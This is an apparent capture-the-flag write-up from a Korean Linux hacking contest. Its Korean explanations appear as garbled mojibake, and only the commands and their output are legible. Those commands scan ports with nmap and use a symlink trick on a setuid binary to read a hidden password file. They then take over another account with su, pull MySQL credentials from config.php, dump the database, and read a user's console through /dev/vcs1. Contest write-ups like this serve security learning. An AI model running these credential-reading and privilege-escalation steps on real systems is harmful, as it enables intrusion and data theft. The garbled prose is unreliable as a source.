::: ´ÙÀ½Àº À̹ø Á¦ 1ȸ Hacking The Linux Contest¿¡¼­ ÀÔ»óÇϽŠlinu ´ÔÀÇ °ø°Ý º¸°í¼­ÀÔ´Ï´Ù. :::

 

 

[nu@gelug linu]$ nmap 211.215.55.247

 

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )

Interesting ports on  (211.215.55.247):

(The 1537 ports scanned but not shown below are in state: closed)

Port       State       Service

23/tcp     open        telnet

80/tcp     open        http

111/tcp    open        sunrpc

3306/tcp   open        mysql

8888/tcp   open        sun-answerbook

 

 

À§ ¸í·ÉÀ¸·Î ÀÏ´Ü Æ÷Æ®¸¦ °Ë»öÇÏ¿´´Ù.

80¹ø°ú 3306À¸·Î À¥»ó¿¡¼­ php°¡ µ¹¾Æ°¡´Â µ¥ »ç¿ëµÇ°Å¶ó »ý°¢Çß´Ù.

23¹øÀº Á¢¼ÓÀ» À§ÇÑ °ÍÀ̶ó »ý°¢Çß´Ù. ±×·±µ¥ 8888¹øÀÌ ¿­·ÁÀÖ¾ú´Ù.

º¸Åë 8888Àº MP3½ºÆ®¸®¹Ö ¼­¹ö·Î »ç¿ëµÇ´Â Æ÷Æ® ¹øÈ£Àε¥ ÀÏ´ÜÀº Á¢¼ÓÀ» ½ÃµµÇغ¸¾Ò´Ù.

 

ºê¶ó¿ìÀú¿¡¼­ http://211.215.55.247:8888 ·Î ½ÃµµÇϴϱñ ¾ÆÀ̵ð¿Í Æнº¿öµå°¡ ³ª¿Ô´Ù.

 

guest°èÁ¤À̾ú´Âµ¥ µé¾î°¡±â Àü¿¡ 23¹ø Æ÷Æ®·Î Á¢¼ÓÀ» ½ÃµµÇßÁö¸¸ Àß µÇÁö ¾Ê¾Ò´Ù.

±×·¡¼­ ±× Æ÷Æ®¸¦ ¸·¾Æ¹ö·È³ª »ý°¢ÇßÁö¸¸ ³ªÁß¿¡ ¾È »ç½ÇÀÌÁö¸¸ ±ÔÄ¢À» È®½ÇÈ÷ Á¤ÇÏÁö

¾ÊÀº ÇØÄ¿½ºÄðÀÇ ¿î¿µ ¶§¹®¿¡ ¹ß»ýÇÑ ¹®Á¦¿´´Ù. ¾Æ¹«Æ° ¿©·¯¹øÀÇ ½ÃÇàÂø¿À ³¡¿¡ ¼º°ø

À» ÇÏ¿´´Ù. ±×·¸Áö¸¸ ³Ê¹«³ª ´À·È´Ù. ¾Æ¸¶µµ DoS °ø°ÝÀ̾ú³ª º¸´Ù. ¾Æ´Ï¸é ¸®¼Ò½º°¡

³Ê¹«³ª ¸¹ÀÌ »ç¿ëµÇ±â ¶§¹®ÀÏ ¼öµµ.. ÈùÆ®¸¦ º¸°í ±× ´ÙÀ½ ÀÛ¾÷À» ½ÃÀÛÇß´Ù.

¹Ù·Î walwal °èÁ¤ ±×·ìÀ¸·Î µÈ ÆÄÀÏÀ» °Ë»öÇغ¸´Â °ÍÀ̾ú´Ù.

 

 

[guest@localhost Gelug]$ find / -group walwal >result 2>/dev/null

[guest@localhost Gelug]$

[guest@localhost Gelug]$ tail result

/proc/32285/exe

/proc/32285/mounts

/var/lib/texmf/a

/var/spool/mail/BOGUS.walwal.5tn

/etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT

/bin/SolveMe/HackTheNose.txt

/bin/SolveMe/walwal

/home/walwal

/home/guest/.?/aa/b

/server/Apache/htdocs/bbs/data/__zbSessionTMP/n.php

 

 

¼ö ¸¹Àº ÆÄÀÏÀÌ ³ª¿ÔÁö¸¸ ±× ±ÇÇÑ ÃëµæÀÚÀÇ È°µ¿¿¡ °ü·ÃµÈ ÆÄÀÏ·Î °£ÁÖÇÏ°í ´õ ¿­½ÉÈ÷

ã¾Æº» °á°ú À§¿Í °°Àº ÆÄÀÏÀÌ ´«¿¡ ¶ç¾ú´Ù.

 

 

[guest@localhost Gelug]$ ll /etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT

-rw-r-----    2 root     walwal          7 Aug 17 12:17 /etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT

 

 

Çϳª¾¿ ls -l ·Î ÆÄÀÏ ±ÇÇÑÀ» º¸´Ï±ñ walwal °èÁ¤À¸·Î º¸´Â °ÍÀ̾ú´Ù.

 

±×·±µ¥ ÇϳªÀÇ ÆÄÀÏ /bin/SolveMe/walwal ¿¡´Â SetUid°¡ °É·ÁÀÖ¾ú´Ù.

Áï ÀÌ ÆÄÀÏ·Î walwalÀÇ ±ÇÇÑÀ» ¾ò°Ô µÇ´Â °ÍÀ̶ó »ý°¢À» Çß´Ù.

 

±×³É Çѹø ½ÇÇàÇغ¸¸é ¼¼±×¸ÕÆ® ½ÇÆжó°í ³ª¿Â´Ù. ÇÁ·Î±×·¥ ³»¿¡¼­ Á¤ÇØÁØ °Í°ú »óȲ

ÀÌ ´Þ¶óÁö¸é ¹ß»ýÇÏ´Â ¿¡·¯ÀÎ °ÍÀÌ´Ù.

 

±×·¡¼­ ¿©·¯°¡Áö ÃßÃøÀ» Çغ¸¾Ò´Ù.

 

 

[guest@localhost Gelug]$ strings /bin/SolveMe/walwal

 

 

·Î Æ÷ÇԵǴ ¹®ÀÚ¿­À» ã¾Æº¸¾Ò´Ù. ³¡¿¡ ./HackTheNose.txt °¡ ÀÖ¾ú´Ù.

 

ÀÌ ÆÄÀÏ¿¡ ±â·Ï¾Æ´Ï¸é ¿­±âÀÏ °ÍÀÌ´Ù. ÆÄÀÏ¿¡ ´ëÇÑ ÀÛ¾÷Àº ¾²±â¿Í Àб⠹ۿ¡ ¾ø±â ¶§

¹®ÀÌ´Ù.

 

½ÇÇàÇغ¸´Ï /bin/SolveMe/HackTheNose.txt ÀÇ ÃÖ±Ù³¯Â¥¿Í ½Ã°£Àº °»½ÅµÇÁö ¾Ê¾Ò´Ù.

 

Á¶±ÝÀÇ »ý°¢À» Çغ¸´Ï °á±¹Àº ÀоîµéÀδٴ °ÍÀ» ¾Ë¾Ò´Ù.

±×°Íµµ ÇöÀç Æú´õ¿¡¼­ ¸»ÀÌ´Ù.

 

°£´ÜÈ÷ ¼ÒÇÁÆ® ¸µÅ©·Î ÇØ°áÀ» ÇÒ ¼ö ÀÖÀ» °Å¶ó »ý°¢ÇÏ°í ½ÃµµÇغ¸¾Ò´Ù.

 

 

[guest@localhost Gelug]$ ln -sf /bin/SolveMe/walwal walwal

[guest@localhost Gelug]$ ln -sf /bin/SolveMe/HackTheNose.txt HackTheNose.txt

[guest@localhost Gelug]$ ll

total 8

-rwxrwxr-x    1 guest    guest          15 Aug 18 06:42 bin*

lrwxrwxrwx    1 guest    guest          28 Aug 18 06:44 HackTheNose.txt -> /bin/SolveMe/HackTheNose.txt

-rw-rw-r--    1 guest    guest        3613 Aug 18 05:58 result

lrwxrwxrwx    1 guest    guest          19 Aug 18 06:43 walwal -> /bin/SolveMe/walwal*

[guest@localhost Gelug]$ ./walwal

±¸Å¸ : ¾Æ¾¾~ ÀÌ°Ô ¹¹¾ß ¾î¶»°Ô Ç϶ó´Â°Å¾ß!

¸Û¸Û : »ý°¢º¸´Ù ½¬¿ï²¬?

±¸Å¸ : ¹¹¾ß¹¹¾ß ÀÌ°Å Èü¿À¹öÇ÷οì¾ß? ³ª ±×°Å ¸øÇØ!

¸Û¸Û : ¸Ó¸® µ×´Ù ¹¹ÇÏ´Ï~

[guest@localhost Gelug]$

 

 

°á±¹ À§¿Í °°ÀÌ ½ÇÇàÀ» Çغ» °á°ú ¿¹»ó´ë·Î ÇöÀç À§Ä¡¿¡¼­ HackTheNose.txt ÆÄÀÏÀ» ¿­

¾ú´Ù. ÆÄÀÏ ³»¿ëÀº À§¿Í °°¾Ò´Ù.

 

¶Ç ÇϳªÀÇ Àǹ®ÀÇ ÆÄÀÏ /etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT À»

º¸°í ½Í¾ú°í ±×°Ô ´äÀ¸·Î »ý°¢ÀÌ µÇ¾ú´Ù.

 

 

[guest@localhost Gelug]$ ln -sf /etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT HackTheNose.txt

[guest@localhost Gelug]$ ./walwal

¸¶Â¡°¡

[guest@localhost Gelug]$

 

 

À§¿¡¼­ ¿©´Â ÆÄÀÏÀº HackTheNose.txt À̾ú´Ù. À̸§¸¸ ÀÌ°Å¸é µÈ´Ù´Â °ø½ÄÀÌ ¼º¸³µÈ °Í

ÀÌ´Ù. ¹°·Ð ÆÄÀÏ Àб⠱ÇÇÑÀº walwalÀÌ°í ¸»ÀÌ´Ù.

À§¿Í °°ÀÌ ÆÄÀÏ ³»¿ëÀÌ º¸¿©Á³´Ù. Àú ÇѱÛÀÌ ¾ÏÈ£±¸³ª »ý°¢À» ÇÏ°í ´ÙÀ½°ú °°ÀÌ Çغ¸

¾Ò´Ù.

 

 

[guest@localhost Gelug]$ su - walwal

Password: (¾ÏÈ£ÀÔ·Â)

[walwal@localhost walwal]$ id

uid=1000(walwal) gid=1000(walwal) groups=1000(walwal)

 

 

id¶ó´Â ¸í·É¾î·Î ÇöÀç »óŸ¦ º¸´Ï±ñ ¿ª½Ã³ª walwalÀ» µû°Ô µÇ¾ú´Ù.

 

walwal¿¡¼­ guta°¡ cronÀ¸·Î ¾î¶² ÇÁ·Î±×·¥À» ½ÇÇàÇÑ´Ù´Â °ÍÀº ¾Ë¾Ò°í ±×°ÍÀÇ ¹ö±×

Áï, system ÇÔ¼öÀÇ Áß°£¿¡ ¹®ÀÚ¿­ÀÌ µé¾î°£ ´Ù´Â °ÍÀ» ¾Ë°í ½Ãµµ¸¦ Çغ¸¾ÒÁö¸¸.

¾ÈŸ±õ°Ôµµ Àß µÇÁö ¸øÇß´Ù. °á±¹ Åë°ú´Â ÇÏÁö ¸øÇß´Ù. ÆÄÀÏÀ» ¸¸µé¾îµµ Àû¿ëÀÌ µÇÁö

¾Ê¾Ò´Ù.

 

´ÙÀ½Àº mysqlÀÇ Æ¯Á¤Å×À̺íÀ» º¸¸é µÈ´Ù´Â ¸»¿¡ PHP¸¦ ¸¹ÀÌ ÇØ¿ÂÅͶó Àߵƴ٠ÇÏ°í ½Ã

µµ¸¦ Çغ¸¾Ò´Ù. ¿ª½Ã³ª ½±°Ô ¾Ë¼ö°¡ ÀÖ¾ú´Ù.

 

ÀÌ°ÍÀº nobodyÀÇ ±ÇÇÑ(À¥»ó¿¡¼­)À¸·Î ¾×¼¼½º°¡ °¡´ÉÇؾßÇϹǷΠmysql¿¡ ¿¬°áÇÏ´Â ¼³Á¤

ÆÄÀÏÀº Ç×»ó other¿¡°Ô Àбâ±ÇÇÑÀÌ ÀÐÀ»°Å¶ó »ý°¢ÇÏ¸é °£´ÜÈ÷ ÇØ°áµÈ´Ù.

Áï, ³ªÇÑÅ×µµ Àб⠱ÇÇÑÀÌ ÀÖ´Â °ÍÀÌ´Ù.

 

 

[walwal@localhost php]$ more /server/Apache/htdocs/bbs/config.php

<?

localhost

guest

welcome

zboard

?>

 

 

Á¦·Îº¸µå À§Ä¡¸¸ ¾Ë¸é ±× µð·ºÅ丮³»¿¡ ÀÖ´Â config.php ÆÄÀÏÀ» ¿­¸é °£´ÜÈ÷ ÇØ°áµÇ´Â

¹®Á¦ÀÌ´Ù.

 

¹Ù·Î mysql Á¢¼Ó¿¡ ½ÃµµÇغ¸¾Ò´Ù.

 

 

[walwal@localhost php]$ /server/Mysql/bin/mysqldump -u guest -pwelcome zboard >aaaa

[walwal@localhost php]$ cat < aaaa

-- MySQL dump 8.22

--

-- Host: localhost    Database: zboard

---------------------------------------------------------

-- Server version       3.23.51

 

--

-- Table structure for table 'zetyx_admin_table'

--

 

CREATE TABLE zetyx_admin_table (

  no int(11) NOT NULL auto_increment,

  group_no int(20) unsigned NOT NULL default '0',

  name varchar(40) NOT NULL default '',

  total_article int(20) NOT NULL default '0',

  skinname varchar(255) default NULL,

  header text,

  footer text,

  title varchar(255) default NULL,

  header_url varchar(255) default NULL,

  footer_url varchar(255) default NULL,

  bg_image varchar(255) default NULL,

  bg_color varchar(255) default '#ffffff',

  table_width int(4) NOT NULL default '95',

  memo_num int(3) NOT NULL default '15',

  page_num int(3) NOT NULL default '8',

  only_board char(1) NOT NULL default '1',

  cut_length int(11) NOT NULL default '0',

  use_category char(1) NOT NULL default '0',

  use_html char(1) NOT NULL default '1',

  use_filter char(1) NOT NULL default '1',

  use_status char(1) NOT NULL default '1',

  max_upload_size int(11) default '2097152',

  use_pds char(1) default '0',

  pds_ext1 varchar(255) default '',

  pds_ext2 varchar(255) default '',

  use_homelink char(1) NOT NULL default '0',

  use_filelink char(1) NOT NULL default '0',

  use_cart char(1) NOT NULL default '0',

  use_autolink char(1) NOT NULL default '1',

  use_showip char(1) NOT NULL default '0',

  use_comment char(1) NOT NULL default '1',

  use_formmail char(1) NOT NULL default '1',

  use_showreply char(1) NOT NULL default '1',

  use_secret char(1) NOT NULL default '1',

  use_alllist char(1) NOT NULL default '0',

  grant_html int(2) NOT NULL default '2',

  grant_list int(2) NOT NULL default '10',

  grant_view int(2) NOT NULL default '10',

  grant_comment int(2) NOT NULL default '10',

  grant_write int(2) NOT NULL default '10',

  grant_reply int(2) NOT NULL default '10',

  grant_delete int(2) NOT NULL default '1',

  grant_notice int(2) NOT NULL default '1',

  grant_view_secret int(2) NOT NULL default '1',

  filter text,

  avoid_tag text,

  avoid_ip text,

  PRIMARY KEY  (no),

  KEY group_no (group_no),

  KEY total_article (total_article),

  KEY name (name)

) TYPE=MyISAM;

 

--

-- Dumping data for table 'zetyx_admin_table'

--

 

 

INSERT INTO zetyx_admin_table VALUES (3,1,'free',38,'nzeo_ver3','','','RS ±Â...

±Â...','','','','white',95,15,10,'1',0,'','1','1','',2097152,'1','','','','',''

INSERT INTO zetyx_admin_table VALUES (2,1,'guest',2,'nzeo_ver3',NULL,NULL,'RS ±Â

... ±Â...','','','','white',95,20,10,'',0,'','1','1','',2097152,'','','','','','

³Ñ\r\n','a,img,embed,font,b,div,center,p,br\r\n','');

 

--

-- Table structure for table 'zetyx_board_category_free'

--

 

......... ÀÌÇÏ »ý·«.............

 

 

¾Æ¹« »ý°¢¾øÀÌ nobody¸¦ Ç®±â À§ÇÑ ÀÛ¾÷À̹ǷΠ°£´ÜÈ÷ µÇ¾ú´Ù.

Àú·¯ÇÑ ÆÄÀϵéÀ» nobody¿¡ ±×·ìÀ» ÁÖ°í ±×·ì¿¡¸¸ Àб⠱ÇÇÑÀ» Áشٸé ÇØ°áµÉ °ÍÀ»

±ÍÂú°í ¸¸µç »ç¶÷ÀÌ ¾Æ´Ï¸é Àß ¸ð¸£°Ô µÇ¹Ç·Î ±×³É µÎ´Â ¹ö±× ÀÎ °ÍÀÌ´Ù.

 

´ÙÀ½À¸·Î´Â rootÀÇ ½ºÅ©¸°À» µû´Â °ÍÀ̾ú´Ù.

ÀÏ´Ü screendump ¶ó´Â ¸í·ÉÀ» ½áº¸±â·Î Çß´Ù. Çغ¸Áö´Â ¾Ê¾ÒÁö¸¸ ¿ØÁö ¿¬°üÀÌ ÀÖÀ»°Å

¶ó´Â ¸·¿¬ÇÑ »ý°¢¿¡¼­ ¿´´Ù. /dev/vcs °ü·Ã device¸¦ ¿­Áö ¸øÇÑ´Ù´Â ¸Þ½ÃÁö°¡ ³ª¿Ô´Ù.

 

 

[guest@localhost ~]$ ll /dev/vcs*

crw--w----    1 vcsa     tty        7,   0 Apr 11 10:25 /dev/vcs

crw--w-r--    1 vcsa     tty        7,   1 Apr 11 10:25 /dev/vcs1

crw--w----    1 vcsa     tty        7,  10 Apr 11 10:25 /dev/vcs10

crw--w----    1 vcsa     tty        7,  11 Apr 11 10:25 /dev/vcs11

crw--w----    1 vcsa     tty        7,  12 Apr 11 10:25 /dev/vcs12

crw--w----    1 vcsa     tty        7,  13 Apr 11 10:25 /dev/vcs13

crw--w----    1 vcsa     tty        7,  14 Apr 11 10:25 /dev/vcs14

 

 

À§¿Í °°ÀÌ ÀÏ´Ü ¸®½ºÆ®¸¦ º¸¾Ò´Ù. /dev/vcs1¿¡ ÀÌ»óÇÏ°Ôµµ other¿¡ r(Àбâ)±ÇÇÑÀÌ ÀÖ

¾î¼­ Àú°Ô ´äÀ̱¸³ª »ý°¢ÇÏ°í »Ì¾Æº¸¾Ò´Ù.

 

 

[guest@localhost ~]$ cat /dev/vcs1 > 4

 

[Eminem as 'Stan']

Dear Slim, I wrote but you still ain't callin

I left my cell, my pager, and my home phone at the bottom

I sent two letters back in autumn, you must not-a got 'em

There probably was a problem at the post office or somethin

Sometimes I scribble addresses too sloppy when I jot 'em

but anyways; fuck it, what's been up?  Man how's your daughter?

My girlfriend's pregnant too, I'm bout to be a father

If I have a daughter, guess what I'ma call her?

I'ma name her Bonnie

I read about your Uncle Ronnie too I'm sorry

I had a friend kill himself over some bitch who didn't want him

I know you probably hear this everyday, but I'm your biggest fan

I even got the underground shit that you did with Scam

I got a room full of your posters and your pictures man

I like the shit you did with Ruckus too, that shit was fat

Anyways, I hope you get this man, hit me back,

just to chat, truly yours, your biggest fan

This is Stan

 

localhost login:

 

 

[guest@localhost ~]$

 

 

À§¿Í °°ÀÌ °£´ÜÈ÷ ´ýÇÁ¸¦ ÇÒ ¼ö°¡ ÀÖ¾ú´Ù.

 

À§ °°ÀÌ ¸î°³ ¹Û¿¡ ¸ø¶¤´Ù. µý °Íµµ ¾Æ´Ï´Ù. ±×³É ÈùÆ®´ë·Î µû¶ó ÇÑ °ÍÀÌ´Ù.

 

¾ðÁ¦Âë ÁøÁ¤ÇÑ ÇØÄ¿°¡ µÉÁö¸¦ »ý°¢Çغ¸¸é ¸Á¸·Çϱ⸸ Çß´Ù. Å©·¡Ä¿°¡ ¾Æ´Ñ ÄÄÇ»Å͸¦

¿¬±¸Çϸ鼭 ÀÏ»ýÀ» »ì¾Æ°¡°í ½ÍÀºµ¥.. ¾Æ¹«Æ° À̹ø ÇØÅ· ´ëȸ. óÀ½À¸·Î Âü°¡ÇÏ´Â

´ëȸÀÌÁö¸¸ Àç¹Ì ÀÖ¾ú´Ù.

 

 

 

** ÀÔ»óÀÚ¿¡°Ô ÇѸ¶µð!! **

 

 

Ginz : Àߺý¿´Ù.. .

 

 

À̸§ :   ³»¿ë :